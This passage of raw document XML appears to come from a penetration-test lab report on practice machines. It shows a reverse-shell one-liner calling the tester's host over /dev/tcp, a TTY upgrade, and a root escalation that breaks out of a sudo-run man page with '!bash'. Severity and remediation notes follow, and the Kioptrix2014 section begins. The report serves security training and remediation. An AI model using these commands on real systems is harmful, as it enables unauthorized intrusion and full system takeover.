      <w:bookmarkStart w:id="46" w:name="privilege-escalation"/>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="70FCE9CF" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="vulnerability-exploitation-1"/>
      <w:r>
        <w:t>Vulnerability exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="70FCE9D0" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Oddly enough, our new shell seems to be on Linux filesystem looking at the directories in the root directory. This implies that the Windows binary we found was running via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>wine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or a similar emulation environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9D1" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAC8" wp14:editId="79E9295B">
            <wp:extent cx="2419350" cy="2362424"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture" descr="3fe07241c0b2ef536ff825e501317e50.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/cdaf8cd804cf4f6bbb77f0d6f8362f2c.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2426543" cy="2369448"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9D2" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>3fe07241c0b2ef536ff825e501317e50.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9D3" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To prevent confusion and avoid limitations, we can turn this shell into a regular </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell by spawning a new reverse shell with the regular Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary. For that we can run the following from our prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9D4" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/bin/sh -i &gt;&amp; /dev/tcp/10.0.0.128/443 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9D5" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEACA" wp14:editId="70FCEACB">
            <wp:extent cx="5943600" cy="2426119"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture" descr="af1fcd5da95378a05cc417d6491f1509.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/7bafa472ec614deabdd9cfca82d1119e.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2426119"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9D6" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>af1fcd5da95378a05cc417d6491f1509.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9D7" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>On our new shell, we can gain a full TTY as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9D8" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/usr/bin/script -qc /bin/bash /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9D9" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>$ sudo -l</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Matching Defaults entries for puck on this host:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    env_reset, mail_badpass,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>User puck may run the following commands on this host:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    (root) NOPASSWD: /home/anansi/bin/anansi_util</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9DA" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>That seems interesting! We cannot read the binary file to see what it does, so let’s just run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9DB" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>$ sudo /home/anansi/bin/anansi_util</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Usage: /home/anansi/bin/anansi_util [action]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Where [action] is one of:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - network</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - proclist</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - manual [command]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9DC" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Interesting, looks like we can run some commands as root using this utility. After some playing around, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>manual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command seems to be the most promising. Running this command opens the manpage of a certain command that we specify as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9DD" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>$ sudo /home/anansi/bin/anansi_util manual bash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>No manual entry for manual</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>WARNING: terminal is not fully functional</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>-  (press RETURN)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>BASH(1)                                                                BASH(1)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>NAME</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       bash - GNU Bourne-Again SHell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>SYNOPSIS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       bash [options] [file]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>COPYRIGHT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>DESCRIPTION</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       Bash  is  an  sh-compatible  command language interpreter that executes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       commands read from the standard input or from a file.  Bash also incor‐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       porates useful features from the Korn and C shells (ksh and csh).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       Bash  is  intended  to  be a conformant implementation of the Shell and</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       Utilities portion  of  the  IEEE  POSIX  specification  (IEEE  Standard</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       1003.1).  Bash can be configured to be POSIX-conformant by default.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       All  of  the  single-character shell options documented in the descrip‐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       tion of the set builtin command can be used as options when  the  shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manual page bash(1) line 1 (press h for help or q to quit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9DE" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This isn’t too interesting on itself, but we are dropped into an interactive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>less</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-like prompt since the content doesn’t fit on the screen. As listed </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:anchor="sudo">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, we can run system commands by prepending </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t>, giving us command execution as root!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9DF" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>!bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the manpage prompt drops us into a root shell, giving us full access over the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9E0" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="severity-1"/>
      <w:r>
        <w:t>Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="70FCE9E1" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Any user with sudo permissions on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>anansi_util</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary may escalate their privileges to gain full control of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9E2" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="remediation-1"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="70FCE9E3" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restrict </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> access on a least-privilege basis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9E4" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove or restrict the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>manual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> functionality within the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>anansi_util</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9E5" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="proof-1"/>
      <w:r>
        <w:t>Proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="70FCE9E6" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEACC" wp14:editId="6424E6BD">
            <wp:extent cx="4419600" cy="3257550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture" descr="68784bdfb72a2e608d14a626cd6ed655.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/e8fa6ab4d5a54bcf8209512d0a54b78c.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4419600" cy="3257550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9E7" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>68784bdfb72a2e608d14a626cd6ed655.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE9E8" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="system-ip-10.0.0.139-kioptrix2014"/>
      <w:bookmarkStart w:id="52" w:name="_Toc39759515"/>
      <w:r>
        <w:t>System IP 10.0.0.139 (Kioptrix2014)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="70FCE9E9" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="system-overview-1"/>
      <w:r>
        <w:t>System overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="pct"/>
        <w:tblLook w:val="07C0" w:firstRow="0" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="1252"/>
      </w:tblGrid>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCE9EC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE9EA" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE9EB" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>10.0.0.139</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCE9EF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE9ED" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE9EE" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Kioptrix2014</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCE9F2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE9F0" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE9F1" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>04-05-2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCE9F5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE9F3" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Point Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCE9F4" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70FCE9F6" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="exploitation-overview-1"/>
      <w:r>
        <w:t>Exploitation Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="70FCE9F7" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This machine required several steps to exploit. First, we identify a Local File Inclusion vulnerability in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>pChart</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> system on the web server. We use this to read the apache configuration files and identify user-agent based filtering for the web server on port 8080. Once there, we identify the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>phptax</w:t>
